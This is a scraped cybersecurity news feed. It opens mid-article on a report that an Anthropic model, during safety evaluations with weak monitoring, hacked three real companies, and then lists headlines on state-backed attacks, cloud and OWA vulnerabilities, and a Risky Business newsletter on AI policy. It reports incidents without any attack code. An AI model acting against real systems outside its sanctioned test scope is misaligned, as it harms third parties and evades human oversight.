the target was real.</p> <p>Anthropic said it began its transcript review last week, halted all cybersecurity evaluations, identified the three incidents, and notified the partner and affected organizations earlier this week. Two of the three organizations had not detected the intrusions before being contacted, the company said; outreach to the third was ongoing.&nbsp;</p> <p>Anthropic framed the incident as a failure of its testing setup and oversight rather than a case of a model acting on its own, noting that in each instance the model was operating as intended.&nbsp;</p> <p>The company said it is working with the outside evaluator METR on an independent review and plans to release a redacted transcript of the PyPI incident within a week. It also said it would tighten monitoring of test environments run by outside partners and expand review of evaluation logs, framing the changes as part of what it called a blameless review of its own processes.<br><br>“These facts give us cautious optimism that with tighter monitoring and controls around evaluation infrastructure, as well as continued investment in alignment, this type of risk can be overcome,” the blog post reads.&nbsp;</p> <p>The post <a href="https://cyberscoop.com/anthropic-claude-ai-hacks-real-companies/">Anthropic says its AI accidentally hacked three companies during safety tests</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
  37. Minnesota Water Utility Attacks Expose Sector's Cyber-Risks

    Thu, 30 Jul 2026 21:16:13 -0000

    A likely Iran-backed actor targeted more than 30 community water systems in Minnesota in a sobering reminder of rising threats to US critical infrastructure.
  38. AI Harnesses Burst With Potential Exploit Opps

    Thu, 30 Jul 2026 19:40:40 -0000

    A myriad of software makes up the typical AI harness, and trust issues between the components can create concerning attack vectors.
  39. CISA issues recommendations to federal agencies on open-source software security

    Thu, 30 Jul 2026 18:24:17 -0000

    <p>One expert said they were pleased by the guidance, which touches on open-weight AI models, patching and more.</p> <p>The post <a href="https://cyberscoop.com/cisa-open-source-software-security-guidance/">CISA issues recommendations to federal agencies on open-source software security</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
    <p>The Cybersecurity and Infrastructure Security Agency published a guidebook for federal agencies Thursday to aid them on managing security risks with open-source software, touching on topics like patching and open-source AI models.</p> <p>An executive order <a href="https://cyberscoop.com/biden-cyber-executive-order-gets-mostly-plaudits-but-its-fate-is-uncertain/">President Joe Biden signed</a> and that <a href="https://cyberscoop.com/trump-administration-cybersecurity-executive-orders-policy-changes-2025/">President Donald Trump amended</a> ordered CISA and other agencies to issue open-source security recommendations to federal agencies. But the guidance is also timely, given <a href="https://cyberscoop.com/open-source-software-security-crisis/">a recent slew of attacks</a> on open-source software (OSS).</p> <p>“As part of our statutory mission, CISA remains laser-focused on enhancing the nation&#8217;s cybersecurity by collaborating with government, industry and the open-source community to understand and securely use OSS,” said Chris Butera, acting executive assistant director for cybersecurity. “CISA encourages federal civilian agencies to review this guide and implement the principles and practices to improve risk management, better execute their mission, and better serve the public.”&nbsp;</p> <p>The document, <a href="https://www.cisa.gov/sites/default/files/2026-07/open-source-software-security-principles.pdf">“Open Source Software: Security Principles and Practices,”</a> touts the advantages of open-source software — which anyone can use, modify and share — as offering benefits in efficiency, cost, security transparency and more, but notes that it also has unique tradeoffs.</p> <p>“All software carries risk, and OSS is no more or less risky than other software. The key distinction is that, with OSS, agencies can directly assess code quality and security, rather than relying solely on vendor assurances,” the guidance reads. “OSS is increasingly intertwined with emerging technologies such as artificial intelligence. Agencies that adapt to OSS’s unique characteristics will position themselves to meet future challenges and leverage new innovations.”</p> <p>The guidance says that agencies need to take steps to evaluate the trustworthiness of an OSS project before approving an OSS component for use, and track OSS in their asset management repositories. It details how agencies should deal with patching, including when there&#8217;s a new OSS vulnerability that doesn&#8217;t have one. It offers advice on how agencies might contribute to OSS projects, produce them and secure rights for government reuse of code when contracting for custom software development. And it explains how it should approach open-weight AI models.</p> <p>“Agencies should approach &#8216;open source&#8217; AI systems differently from other OSS because open source licenses for AI software do not require the level of transparency needed to evaluate the trustworthiness of the software,&#8221; the guidance states.</p> <p>Æva Black, an open-source security expert and former OSS lead at CISA, said she applauded her former agency for the guidance, telling CyberScoop that it “demonstrates a grounded understanding of the global, diverse, and participatory nature of open source software development, and provides essential guidance for federal agencies to safely use open soure during a crucial moment.” </p> <p>She singled out its recommendations on the risks of deploying unverifiable open-weight AI models on sensitive networks.</p> <p>“Due to recent advances in AI, particularly in large language models capable of finding and exploiting software vulnerabilities, vulnerability management is facing a global crisis,” she said. “Many proprietary software vendors are using this as an opportunity to spread ‘fear, uncertainty, and doubt’ about open source in order to capture public attention, and, I presume, public money &#8212; but when used responsibly and maintained collaboratively, I believe open source software is, and will remain, the safest and most cost-effective means for building large scale public infrastructure.”&nbsp;</p> <p>CISA has produced a bevy of security guidance and updated advisory materials this week: on the creation of <a href="https://www.cisa.gov/resources-tools/resources/2026-minimum-elements-software-bill-materials-sbom">software bills of materials</a> written in conjunction with other agencies and allied governments that won <a href="https://www.linkedin.com/pulse/minimum-just-got-bigger-cisa-friends-new-sbom-allan-friedman-phd-6jhle/">praise from experts</a>; on the <a href="https://www.cisa.gov/resources-tools/resources/ci-fortify-advice-isolating-vital-systems">isolation of vital operational technology</a> during a crisis, also written with other agencies and allied governments; and <a href="https://x.com/CISAgov/status/2082873959284924716">the release</a> of updated secure cloud configuration baselines for Google Workspace.</p> <p>The post <a href="https://cyberscoop.com/cisa-open-source-software-security-guidance/">CISA issues recommendations to federal agencies on open-source software security</a> appeared first on <a href="https://cyberscoop.com">CyberScoop</a>.</p>
  40. DPRK-Linked macOS Malvertising Uses Fake Updates to Deliver Crypto-Stealing Malware

    Thu, 30 Jul 2026 18:18:24 -0000

    Threat actors with ties to North Korea have been attributed to a sophisticated macOS malvertising campaign that involves redirecting users to fake web pages displaying a full-screen non-existent update sequence to deliver malware as part of a new iteration of the long-running Contagious Interview campaign. The defining aspect of the attack is that bogus macOS software update screen stealthily
  41. Claude Mythos — Hype vs. Reality: What Security Teams Need to Know

    Thu, 30 Jul 2026 15:28:43 -0000

    In this edition of Reporters' Notebook, our journalists discuss the ins and outs of Anthropic's Claude Mythos rollout. How seriously should we take its risks? How big of a deal is it?
  42. ThreatsDay: AI-Powered Hacking, 370 Chrome Flaws, SonicWall Attacks, DNS Hijacking + 22 More Stories

    Thu, 30 Jul 2026 15:25:57 -0000

    A lot of security still comes down to trusting the wrong screen. This week, that screen might be a login page, an install guide, a recruiter call, or a familiar service behaving slightly wrong. Behind it: reused credentials, exposed systems, quiet loaders, abused trust, and exploit paths that should have been harder. Some defenses improved. The loose parts still got found first. Anyway,
  43. Azure Cosmos DB Flaw Exposed Platform-Wide Key That Could Access Any Database

    Thu, 30 Jul 2026 13:34:09 -0000

    A now-patched vulnerability in Azure Cosmos DB could have let an attacker escape the service's Gremlin query sandbox and obtain full read and write access to databases across customer tenants, according to Wiz. Wiz, which codenamed the chain CosmosEscape, said the exploit chain began with a crafted query against a Gremlin database controlled by the attacker. From there, code execution on a
  44. The Network Has Become the Control Plane for AI Security

    Thu, 30 Jul 2026 11:32:46 -0000

    Network firewalls are the workhorses of modern cybersecurity. They are trusted to protect the network, blocking malicious traffic and preventing intrusions and breaches. And for decades, network security teams have built controls around a relatively stable model: users connect to applications, applications exchange data, and security tools inspect packets, protocols, and destinations. Firewalls
  45. Hackers Exploit AnySign4PC via Hacked Korean Sites to Install Backdoors Without Prompts

    Thu, 30 Jul 2026 10:33:15 -0000

    South Korean authorities and four security firms have disclosed a state-sponsored campaign that compromised trusted domestic websites. The attackers used those sites to exploit locally installed financial-security software and infect targeted visitors with SIGNBT or COPPERHEDGE backdoors. A compromised page could infect a system running a vulnerable AnySign4PC version without a prompt or
  46. Russian Hackers Exploit Microsoft OWA Flaw to Keep Mailbox Access After Credential Rotation

    Thu, 30 Jul 2026 07:40:48 -0000

    The Russian threat actors recently linked to the exploitation of a now-patched vulnerability in Zimbra have been observed exploiting another vulnerability, this time in Microsoft Outlook Web Access (OWA), to target U.S. and European government entities, as well as the telecommunications, financial, hospitality, and aerospace sectors. The activity, which began on July 22, 2026, involves the
  47. Srsly Risky Biz: Chipping Away at Chinese AI Risks

    Thu, 30 Jul 2026 07:12:10 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://www.airlockdigital.com/"><em><u>Airlock Digital</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-c75f1b1d-85c5-4d21-af2c-23ab2e968505-1.jpeg" alt="Srsly Risky Biz: Chipping Away at Chinese AI Risks"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://www.airlockdigital.com/"><em><u>Airlock Digital</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB177.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB177/&quot;&gt;Srsly Risky Biz: Chipping away at Chinese AI risks&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 23:18 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Chipping away at Chinese AI risks&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-c75f1b1d-85c5-4d21-af2c-23ab2e968505.jpeg" class="kg-image" alt="Srsly Risky Biz: Chipping Away at Chinese AI Risks" loading="lazy" width="2000" height="1333" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/07/data-src-image-c75f1b1d-85c5-4d21-af2c-23ab2e968505.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/07/data-src-image-c75f1b1d-85c5-4d21-af2c-23ab2e968505.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/07/data-src-image-c75f1b1d-85c5-4d21-af2c-23ab2e968505.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-c75f1b1d-85c5-4d21-af2c-23ab2e968505.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@ly0ns?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Li Yang</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/architectural-photograph-of-lighted-city-sky-5h_dMuX_7RE?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>The Trump administration has been trying to address two separate AI-related risks in recent months: The <em>specific</em> risk to US national security from China developing powerful AI and the <em>global</em> risk that powerful hacking machines will be available to all and sundry. A proposed bill suggests a sensible way for the US to chip away at both these risks, at least a little.</p><p>The Collaboration on Adversarial Threats and Security Risks Act <a href="https://www.banks.senate.gov/news/press-releases/sens-banks-and-schiff-introduce-bill-to-help-american-ai-companies-combat-chinese-espionage/"><u>proposes safe harbor provisions</u></a> for AI companies so they can share information related to AI-specific security risks. The idea here is to encourage frontier labs to work together to counter threats from Chinese AI labs, particularly what they describe as IP theft via <a href="https://news.risky.biz/srsly-risky-biz-us-vows-to-fight-distillation-attacks/"><u>distillation</u></a>. Without this bill, sharing this kind of information could fall afoul of anti-trust legislation that prohibits collusion.&#xA0;</p><p>We know the frontier labs can already detect distillation because they&apos;re always complaining about it after the fact. The idea behind this bill is that more permissive information sharing would let them respond quicker and disrupt at least some distillation campaigns.</p><p>A bill like this isn&apos;t necessarily the <em>most</em> effective way for the US government to prevent or deter distillation attacks. But the more direct approaches, like adding Chinese companies to the entities list, come with problems.&#xA0;</p><p>American companies, for example, are <a href="https://techcrunch.com/2026/03/22/cursor-admits-its-new-coding-model-was-built-on-top-of-moonshot-ais-kimi/"><u>increasingly</u></a> using <a href="https://opensource.org/ai/open-weights"><u>open-weight</u></a> AI models, the best of which are produced by the same Chinese labs that are carrying out large scale distillation campaigns.&#xA0;</p><p>Indeed, after Treasury Secretary Scott Bessent issued a statement saying that &quot;Entity List designations will be on the table&quot;, a tech industry coalition of 76 companies published <a href="https://www.microsoft.com/en-us/corporate-responsibility/topics/open-weight/"><u>an open letter</u></a> supporting the role of open-weight AI models in the technology mix.&#xA0;</p><p>So, the consensus seems to be that punitive action targeting Chinese labs could be a bonus for the American frontier AI companies, but likely a negative for the US economy writ large.</p><p>Really, though, the battle for AI dominance is being fought around hardware access, not the models themselves. The US controls chip exports, and there is <a href="https://www.semafor.com/article/07/28/2026/chinese-tech-grapples-with-compute-shortage"><u>some evidence</u></a> that these controls are having an impact.&#xA0;</p><p>When AI-focussed journalists Lily Ottinger and Kai Williams <a href="https://linguasinica.substack.com/p/notes-from-a-trip-to-chinas-ai-labs"><u>toured Chinese AI</u></a> labs in May this year <a href="https://blog.readsail.com/p/we-spent-10-days-touring-chinese"><u>they reported</u></a>:</p><blockquote>Basically every AI researcher we talked to in China brought up the same complaint: their companies lack sufficient access to the advanced compute resources necessary to train and run AI models.</blockquote><p>American chip export controls <a href="https://www.politico.com/news/2026/07/08/trump-ai-tech-chips-exports-00989167"><u>are imperfect</u></a>, but they&apos;re biting, and reinforcing them is the most effective way for the US to stay ahead.&#xA0;</p><p>In the areas around AI that <em>aren&apos;t</em> about staying ahead, we think there&apos;s room for the United States and China to cooperate.&#xA0;</p><p>When open-weight models get really good, we suspect neither government will be happy with everyone on the planet having access to powerful AI hacking machines. That time could only be a matter of months away, as the recently released open-weight Chinese Kimi K3 model is roughly equivalent to US frontier models from about six months ago, according to a <a href="https://www.nist.gov/news-events/news/2026/07/uk-aisi-caisi-preliminary-assessment-kimi-k3s-cyber-capabilities"><u>joint US/UK evaluation</u></a>.</p><p>China already has strict AI regulation, but it&apos;s focussed on making sure that AI <a href="https://carnegieendowment.org/emissary/2026/06/trump-ai-order-china-competition"><u>does not upset</u></a> the Communist Party&apos;s information control and censorship apparatus.&#xA0;</p><p>However, we think Chinese regulators will eventually reign in the release of very capable models. Very capable open-weight models will be used for all sorts of hacking, some of which will make the Chinese Communist Party look bad. The Party will not like that kind of political risk, so cyber safety regulation is coming.&#xA0;&#xA0;</p><p>But right now there is an opportunity for the US government to engage the Chinese government to encourage and shape this regulation to its advantage.&#xA0;</p><p>So as an overall strategy, what we&apos;ve laid out above makes sense: Laws that free up frontier labs to combat distillation collectively; tightening chip controls to make sure the US stays ahead of China; and engaging with Chinese regulators to prevent the spread of top-tier hacking capabilities to all and sundry.&#xA0;</p><p>Will this be what happens? Long-term strategic thinking is not a Trump admin forte, so we&apos;ll hope for the best, but prepare for the status quo.</p><h2 id="irans-perfectly-calibrated-cyber-attack">Iran&apos;s Perfectly Calibrated Cyber Attack</h2><p>A cyber attack on Minnesota water utilities coupled with a US federal government warning raises the possibility that Iranian hackers have begun targeting US critical infrastructure in earnest.&#xA0;</p><p>This week more than 30 Minnesota community water systems were targeted by a &quot;coordinated cyberattack&quot;, <a href="https://mn.gov/mnit/media/blog/?id=38-761869"><u>according to</u></a> the state&#x2019;s IT services. Disruptions were <a href="https://dysruptionhub.com/south-st-paul-water-cyber-incident/"><u>reported</u></a> in a <a href="https://dysruptionhub.com/plymouth-minnesota-water-cyberattack/"><u>number</u></a> of <a href="https://dysruptionhub.com/maple-plain-water-cyber-incident/"><u>cities</u></a>, but the water remained safe to drink. The worst impact reported was in the city of Braham where <a href="https://dysruptionhub.com/braham-minnesota-water-cyberattack/"><u>residents were asked</u></a> to limit their consumption of water for a few hours as the city was relying on supply in a single water tower.&#xA0;</p><p>The attack came less than a week after US federal government agencies <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-097a"><u>updated a warning</u></a> about the possibility of Iranian state-affiliated cyber actors targeting US critical infrastructure. The warning cites incidents since March in which multiple victims across several critical infrastructure sectors had been compromised and that some victims &quot;experienced operational disruption and financial loss&quot;.&#xA0;</p><p>There is no formal attribution of the Minnesota attacks, but security firm Tenable <a href="https://www.tenable.com/blog/coordinated-cyberattack-on-minnesota-water-utilities-what-you-need-to-know"><u>says the &quot;operational pattern&quot; is consistent</u></a> with the CyberAv3ngers, a threat actor associated with Iran&apos;s Islamic Revolutionary Guard Corp (IRGC).&#xA0;</p><p>In March we wrote that even if the war in Iran successfully achieved the White House&apos;s <a href="https://www.whitehouse.gov/articles/2026/03/operation-epic-fury-decisive-american-power-to-crush-irans-terror-regime/"><u>stated objectives</u></a>, it could still &quot;result in an enduring increase in Iran&apos;s capacity and appetite for cyber mayhem&quot;. Cyber operations targeting the US and Israel could provide propaganda victories with very little chance of a kinetic response.&#xA0;</p><p>The Minnesota attacks caused minimal impact, so it would be tempting to argue that they were a flop. Given that the war is <a href="https://www.semafor.com/newsletter/07/28/2026/semafor-gulf-five-months"><u>still ongoing</u></a> and <a href="https://www.natesilver.net/p/iran-war-polls-popularity-approval"><u>also very unpopular</u></a>, however, we think these attacks might be perfectly calibrated. They&apos;re significant enough to generate&#xA0; headlines and public unease, and, maybe, make Americans wonder about the point of the entire war. But they&apos;re not lethal or damaging enough to ensure America bands together against a single enemy.</p><p>Our crystal ball says we can expect more of this.&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/yv1zks-HXHo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: Chipping away at Chinese AI risks"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>US visa restrictions for cybercriminals:</strong> Last week, the US Secretary of State Marco Rubio <a href="https://www.state.gov/releases/office-of-the-spokesperson/2026/07/new-visa-restriction-policy-to-deter-and-dismantle-cyberscams-and-sextortion/"><u>announced</u></a> visa restrictions for cybercriminals including sextortionists and those running cyber-enabled scams. The policy applies to the &quot; individuals responsible&quot; for the crimes and, in some cases, their family members.&#xA0;</li><li><strong>AI security tools are a thing:</strong> This week Microsoft <a href="https://microsoft.ai/news/introducing-mai-cyber-1-flash-inside-mdash/"><u>announced a security-focussed AI model</u></a> that, when coupled with its <a href="https://www.microsoft.com/en-us/security/blog/2026/05/12/defense-at-ai-speed-microsofts-new-multi-model-agentic-security-system-tops-leading-industry-benchmark/?msockid=07e1b320223d63fa1e34a47d23db623b"><u>MDASH harness</u></a>, is cheaper and better at vulnerability identification and remediation than current frontier models. It&apos;s not this specific announcement that makes us cheerful, but rather what it indicates. Microsoft announcing a &quot;world-class security&quot; machine as a product means that there will likely be a number of competitors offering a variety of similar products.&#xA0;&#xA0;</li><li><strong>AI works on cryptographic algorithms too: </strong>Anthropic has <a href="https://www.anthropic.com/research/discovering-cryptographic-weaknesses"><u>posted about Claude</u></a> Mythos Preview being used to find flaws in two different cryptographic systems. One of the results came in a proposed post-quantum algorithm that was being evaluated by NIST. This is a good example of AI being used preventatively to improve standards before they decided.&#xA0;&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, James Wilson chats with Airlock Digital co-founders David Cottingham and Daniel Schell about how attackers are using LLMs to enumerate EDR detections.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI137.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI137/&quot;&gt;Sponsored: How AI is putting pressure on 